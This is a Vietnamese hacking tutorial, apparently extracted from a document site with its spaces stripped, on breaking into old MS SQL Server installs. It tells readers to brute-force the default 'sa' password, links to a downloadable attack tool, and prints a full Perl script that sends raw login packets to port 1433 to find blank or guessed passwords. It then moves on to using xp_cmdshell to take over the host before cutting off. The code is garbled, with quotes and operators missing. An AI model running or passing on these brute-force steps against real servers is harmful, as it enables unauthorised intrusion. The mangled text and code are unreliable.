Thông tin tài liệu:
Hồi giờ chúng ta tấn công vào server dùng MS SQL Server đa phần là dùng kĩ thuật SQL injection , đây là kĩthuật hack phải nói là hay nhất , hiệu quả cao và nhanh chóng nhất , tuy nhiên trong bài này tôi sẽ đề cập đến1 cách khác để hack vào MS SQL Server , cách này tuy xác suất thành công không cao bằng SQl injectionnhưng cũng đáng để quan tâm bởi vì đâu phải lúc nào chúng ta cũng tìm thấy lỗi SQl injection ....
Nội dung trích xuất từ tài liệu:
Tấn Công Ms Sql Server, (cách cổ điển)TấnCôngMsSqlServer,(cáchcổđiển)trangnàyđãđượcđọc lầnGiớithiệu:hồigiờchúngtatấncôngvàoserverdùngMSSQLServerđaphầnlàdùngkĩthuậtSQLinjection,đâylàkĩthuậthackphảinóilàhaynhất,hiệuquảcaovànhanhchóngnhất,tuynhiêntrongbàinàytôisẽđềcậpđến1cáchkhácđểhackvàoMSSQLServer,cáchnàytuyxácsuấtthànhcôngkhôngcaobằngSQlinjectionnhưngcũngđángđểquantâmbởivìđâuphảilúcnàochúngtacũngtìmthấylỗiSQlinjection.CáchnàycủachúngtatạmgọilàTRSQLvìđaphầnlànhờmaymắn,nhưngchảhiểusaohồitrướctớigiờtôithấycáimaymắnnàylạihayxảyra.Côngcụđầutiênchúngtacầnlàsqlbf(SQLBruteForce)cáinàycứvàopacketstormmàtìm.VàcáitoolconnectvàoMSSQLServer:http://www.hvaonline.net/exploite/SqlExec.exeChúngtabắtđầu:HầuhếtMSSQLServerđầuchạytrênTCPport1433,cònnếuchạytrênportkhácthìmìnhdùngcôngcụscanlàcũngrangaythôi.CáiMSSQLservermàchúngtabànluậnởđâyhơicũchútlà:SQL6.5&7.0.Tuycũnhưngtôivẫnviếtraởđâymụcđíchlàhọchỏikinhnghiêmchứkhôngphảimụcđíchlàtìmmụctiêuđểhackpháphách.Downloadsqlbtvềxongthìrunnó,rấtdễdùng,côngviệccủanólàkiếmpasswordchochúngtalogin.NhượcđiểmcủaMSSQLserverthứnhấtlàmặcđịnhsystemadministratorlàsa,dođóchúngtakhôngcầnphảibrutecáiusernamemàchỉcầnbruteforcecáipasswordlàđủ,thứ2làdefaultpasswordcủasalàkhôngcógìhết,cáinàymớichếtngười,aicũngquanniệmlàchỗnguyhiểmnhấtchínhlàchỗantoànnhất,bởivậypasswordlàkhôngcógìhếtthìđốaingờđược,sailầmchếtngườicủanhiềungườiquảntrịmạngởchỗđó,vìchúngtacósqlbftoolnênaicósuynghĩđólàchếtliền.Sẵnđâytôicũnggiớithiệuvớicácbạncáitoolscanservercópasswordlàkhôngcógìhết:savelạinộidungcodesauthànhfilesenseql.pl,vàrun:•scansforhostswithblankpasswords•BruteForcesloginattempts.#!/usr/bin/perl##SQLusername/passwordchecker##Parameters:senseql##Eg.tocheckforblankSA:##senseql10.0.0.1sa##RoelofTemmingh/HaroonMeer##roelof@sensepost.com/haroon@sensepost.com##SensePostITSecurity##http://www.sensepost.com/http://www.hackrack.com/##2001/11/09useIO::Socket;$|=1;if($#ARGV$port=1433;$host=$ARGV[0];$username=$ARGV[1];$pass=$ARGV[2];$unh=pack(a30,$username);$psh=pack(a30,$pass);$numu=pack(c,length($username));$nump=pack(c,length($pass));$FRONT=020002000000020000000000000000000000000000000000000000000000000000000000000000;$REST=30303030303061300000000000000000000000000000000000201881b82c080301060a090101000000000000000000737175656c646120312e30000000000000000000000000000000000000000b0000000000000000000000000000000000000000000000000000000000000000;$REST2=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040200004d5344424c49420000000706000000000d11000000000000000000000000000000000000000000000000;$hfront=pack(H*,$FRONT);$hrest=pack(H*,$REST);$hrest2=pack(H*,$REST2);$FULL=$hfront.$unh.$numu.$psh.$nump.$hrest.$nump.$psh.$hrest2;$SENDY2=0201004700000200000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030303000000003000000;$SENDY2=pack(H*,$SENDY2);print$host:$username:$pass:;$remote=IO::Socket::INET>new(Proto=>tcp,PeerAddr=>$host,PeerPort=>$port)||dieNoSQLhereman...;print$remote$FULL;print$remote$SENDY2;recv($remote,$back,100,MSG_PEEK);if($back=~/contexttomaster/){printYepgoforit
}else{printNodude..
;}close($remote);Letsmoveon…atleasttoadminswhohavehadthesensetochangetheadminpasswordGiảsửnhưsqlbttìmrapasswordcủasavàloginvàovớiusernamesa,chúngtaphảilàmgìđâyđểnắmhoàntoànhệtthống?GiờđâychúngtacóthểdùngStoresProcedures,đặcbiệtlàxp_cmdshell,vấnđềbigiờgiốngnhưlàchúngtahackbằngSQLinjectionmàcóquyềnsavậy.SẵnđâytôisẽgiớithiệuchocácbạnbiếtsơvềcácExtendedStoresProcedurescầ ...